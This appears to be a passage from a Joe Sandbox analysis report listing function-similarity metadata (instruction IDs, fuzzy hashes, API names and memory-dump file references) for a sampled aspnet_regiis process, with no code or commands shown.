                                                                                      • Instruction ID: e9acb1fec93c2daf5f590c4b2c578807cc67bbad730a9884fcdd8a292a815c58
                                                                                      • Opcode Fuzzy Hash: 4c1a78cb8ddbe31908a54507157d22bdaa3c50d1d7382cf41a264abbed06cbeb
                                                                                      • Instruction Fuzzy Hash: BAB12972A043215BEB149E28CC8176BBFD6BBC4314F19893DFD9997381EA78EC058791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 557a8d30f6a7c597846095b6f2d22431891f584169af48a3d1747a44cda4352c
                                                                                      • Instruction ID: 785ab65e2b6d84e041e8ef5cfe62c84af13ba605958da9d405a72532b99f46f5
                                                                                      • Opcode Fuzzy Hash: 557a8d30f6a7c597846095b6f2d22431891f584169af48a3d1747a44cda4352c
                                                                                      • Instruction Fuzzy Hash: AB91D4B16083018FE714DF28E88176BBBE6FBD4304F19842DE88987351DB74D808DB82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 480fde41bfd12f151ad65f30445c4e29bd84238b6821d4b92cd69060d2790248
                                                                                      • Instruction ID: dae92c3fe99852cf80fb838193df7b6daae14dcada44fb36c229bdf4f03c8b59
                                                                                      • Opcode Fuzzy Hash: 480fde41bfd12f151ad65f30445c4e29bd84238b6821d4b92cd69060d2790248
                                                                                      • Instruction Fuzzy Hash: 5A61E5316093019FDB248A28D881B2BBBE6FBD4314F19893CE9858B391D674DC46CB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e2751584834891066f46621d2bf4ff7a46fe69eb1e52504ddc3e52e4748a193e
                                                                                      • Instruction ID: b67ea161119325ddb96c0b67e1284ff8a6a946d617fedf63bea57b52dc19de8a
                                                                                      • Opcode Fuzzy Hash: e2751584834891066f46621d2bf4ff7a46fe69eb1e52504ddc3e52e4748a193e
                                                                                      • Instruction Fuzzy Hash: CB512676A043105BD724AA18CC44B37BBF3BBD4724F2A846EE985BB395E6719C01C7E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b825a525a1892fefedc3cb7bcc3f59d9c2f89a058fef1b294b11f7fb3719a26
                                                                                      • Instruction ID: cafdce577732b6c80ec9515fedbba197dd450b452bb0b0aa7cfe88b2cbd28832
                                                                                      • Opcode Fuzzy Hash: 1b825a525a1892fefedc3cb7bcc3f59d9c2f89a058fef1b294b11f7fb3719a26
                                                                                      • Instruction Fuzzy Hash: 0551B271A047119FC714DF18C8A0926BBA1FFC9325F19466EEC958B352E730EC4ACB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9b5884694bf0c3e71b17b348f7f8ea75e3c0f3891a9632c2b6854d72e7980c5f
                                                                                      • Instruction ID: ae54f2ba1d851da0db808c3adaeb36c3887cc28d68d279bed81f8c11fb3fc947
                                                                                      • Opcode Fuzzy Hash: 9b5884694bf0c3e71b17b348f7f8ea75e3c0f3891a9632c2b6854d72e7980c5f
                                                                                      • Instruction Fuzzy Hash: 1D412C303483409BF721AB289C8463BBBA6FBD6310F15892ED8C1A3155D330AC41D793
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e0bea1982131dd03b7e244c15eade8158d0d52132d28dafed8fac9d41017164
                                                                                      • Instruction ID: aba3946d34e421dc3c312f821247b814bad0e3e2d2d473c6cfac2239f58c623a
                                                                                      • Opcode Fuzzy Hash: 0e0bea1982131dd03b7e244c15eade8158d0d52132d28dafed8fac9d41017164
                                                                                      • Instruction Fuzzy Hash: 003137716053006BEA10BA249C85B3BBF99FF91359F14483AFD85AB252E221DC05C7A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5238d7322f9bbf9c53c7783aa181dae262774b788ae642037a13d7f22940baad
                                                                                      • Instruction ID: cf5167d9e0fed58c242c953dbf9164990b8bb4d819b5ddaa9bd921d021d191a0
                                                                                      • Opcode Fuzzy Hash: 5238d7322f9bbf9c53c7783aa181dae262774b788ae642037a13d7f22940baad
                                                                                      • Instruction Fuzzy Hash: 0F21083065C3448BDF298F74A9D83B97B36FB65310F6092ADC44E27265DB314C46AB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1649295fb1477b7db2a9cf3e44ab76b69c4b3aa479a04e88ae5594c86e9f7d4
                                                                                      • Instruction ID: bca826c96a6c5f2abbf380bc1edfa762d426e330d1f371b65ce1a8c75e9f3d54
                                                                                      • Opcode Fuzzy Hash: e1649295fb1477b7db2a9cf3e44ab76b69c4b3aa479a04e88ae5594c86e9f7d4
                                                                                      • Instruction Fuzzy Hash: 10117B2175421189E324AE95C885277F799EBCD324F19857BDD80AF191E275DC4183E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7a50a05c2f2fec31dfa19429be8c030c0db81d07230f92d6d135a7a53bfbdb35
                                                                                      • Instruction ID: 52f63ef7e2c131362434ad98d7d529114ca6f55f1b7b07362db532c4da4e8cae
                                                                                      • Opcode Fuzzy Hash: 7a50a05c2f2fec31dfa19429be8c030c0db81d07230f92d6d135a7a53bfbdb35
                                                                                      • Instruction Fuzzy Hash: 7A113A725493519BC725CB08A8A063ABBB2BF94315F54D81ED08327149C3758D06A7F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction ID: 80b47d6de0715a89896910a5c688a08e7911ca46278ca2a33c293d8c6222ac9a
                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                      • Instruction Fuzzy Hash: 3C11E933A095D80EC3169D3D8400565BFA32AA7275B794399F8F5EB2D2D622CD8A8364
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ef2608c42492b657754561bd498ad70c55afd30665320728b60ee320b216277
                                                                                      • Instruction ID: 879fc98121084a677418048002358221f7ced282e2abae05197ff60a11d90859
                                                                                      • Opcode Fuzzy Hash: 3ef2608c42492b657754561bd498ad70c55afd30665320728b60ee320b216277
                                                                                      • Instruction Fuzzy Hash: E2015EF160430247DB20AE64A4D5B2BEFB8BF85705F18853DE80D57602DB65EC09D6A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 984483b2fb95de2e3c2bbbd52ea3b7c2932e618e113cc31968af4b79f318a8d3
                                                                                      • Instruction ID: eda87e5ad42b57003ed960d1f134f2b3124504a0108d5731b9d38fed6da8b092
                                                                                      • Opcode Fuzzy Hash: 984483b2fb95de2e3c2bbbd52ea3b7c2932e618e113cc31968af4b79f318a8d3
                                                                                      • Instruction Fuzzy Hash: 3411E7B5C24401EEDB01EF20BD8F9283E61F7752057864826F811B6A76F6320A28AB59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24eba06c9b1d5a73650a21d4224561bbd5cc06d03a50880e7562be93452fe34a
                                                                                      • Instruction ID: 0274318746194acc156f995659c22b50421cac16a6b3ca2e3537e599903bceeb
                                                                                      • Opcode Fuzzy Hash: 24eba06c9b1d5a73650a21d4224561bbd5cc06d03a50880e7562be93452fe34a
                                                                                      • Instruction Fuzzy Hash: 21F0463638866707A311CD96DCD0967B7A7F7CA212B4D813ADD8093604C930FC0B82E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                      • Instruction ID: 64a7c8896e8eeba4bbea635fee0b30c7ab2f31a153687727d6b06e99ce911ab8
                                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                      • Instruction Fuzzy Hash: 67D05E31608321869F64DE19A400977FBF0FAC7B11F49955EF986E3148E330EC41C2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b3c47707cfe4d338af85898dd9705dc08fef6216e81da6931ac4336dab3216c3
                                                                                      • Instruction ID: 93eaec273f4684116637df2e0bb3ad248522b484a411848225dd41edd5ec0aa4
                                                                                      • Opcode Fuzzy Hash: b3c47707cfe4d338af85898dd9705dc08fef6216e81da6931ac4336dab3216c3
                                                                                      • Instruction Fuzzy Hash: 70D05E39928001DBD604EB20EC4B934763273A22457451862EC26F7673FB228928665D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69d6e55d98c75d26601fb4c510710217df60b5203792f80235878d9e6acf1237
                                                                                      • Instruction ID: 6ecfb5b495c0862fcb6a2df6f4defd9448ba48aa1ee07ef05479572e90a2aea5
                                                                                      • Opcode Fuzzy Hash: 69d6e55d98c75d26601fb4c510710217df60b5203792f80235878d9e6acf1237
                                                                                      • Instruction Fuzzy Hash: E3D012B5E400134B9D18EB24AC8353A7275A7DB24CB04383AD40BD3313EA20D419E59F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf21cbce670268ee2d5672542e6cf7b4ddf1a403b6f6c03e0a45c4e9ac93d395
                                                                                      • Instruction ID: ea0e56b8b103e5954dc49c4cfabc9dc4f81a41219cb2e7e60940dc9859af866c
                                                                                      • Opcode Fuzzy Hash: bf21cbce670268ee2d5672542e6cf7b4ddf1a403b6f6c03e0a45c4e9ac93d395
                                                                                      • Instruction Fuzzy Hash: 88B092E5C102018FD8503A243D9642AFD28A567307F0434B6AC0722A03A626D11CC8AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0688ed3693ed0431b3a626e0b02b9ff456d6db02bb6757f7a3715acdabda09d5
                                                                                      • Instruction ID: ddba48bed8ef27f3d4d11f5a91da9bc85aa4862b8fa24113c9fd462438ccf1c4
                                                                                      • Opcode Fuzzy Hash: 0688ed3693ed0431b3a626e0b02b9ff456d6db02bb6757f7a3715acdabda09d5
                                                                                      • Instruction Fuzzy Hash: 8EA00231948200CEC641DF54DD44579F6B9575B201F1178159158E3121C621D5145769
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitVariant
                                                                                      • String ID: #$)$+$-$/$5$7$=$C$J$Q$S$U$W$Y$[$\$]$_
                                                                                      • API String ID: 1927566239-3571421908
                                                                                      • Opcode ID: 64bc91163ca199dd9576cb0834187f98330071815eedac6429da5f6a8a5718c1
                                                                                      • Instruction ID: 28e46742ee1439d2ce7ecf7726fe7ef4c4afd2ac5f84dafea93bbc68118fd3ae
                                                                                      • Opcode Fuzzy Hash: 64bc91163ca199dd9576cb0834187f98330071815eedac6429da5f6a8a5718c1
                                                                                      • Instruction Fuzzy Hash: C851067150C7C18EE3369B2888597DBBFE26BE6308F48895DC1DC4B392C7B9454A8B53
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Q$S$U$W$Y$[$]$_
                                                                                      • API String ID: 2610073882-2615533518
                                                                                      • Opcode ID: 291974cb8ae2083817668c50d1a9e91ba0acd3abfde589f619b8b03b40f2151c
                                                                                      • Instruction ID: e37739a7abf21cf1427fcb59aeab9b0c4a85abcce4274e0baa0776e3419bb773
                                                                                      • Opcode Fuzzy Hash: 291974cb8ae2083817668c50d1a9e91ba0acd3abfde589f619b8b03b40f2151c
                                                                                      • Instruction Fuzzy Hash: 2A412930108BC1CED7159F3C8898656BFA16BA6324F1886DCD8E90F3DBC2B5D509CB62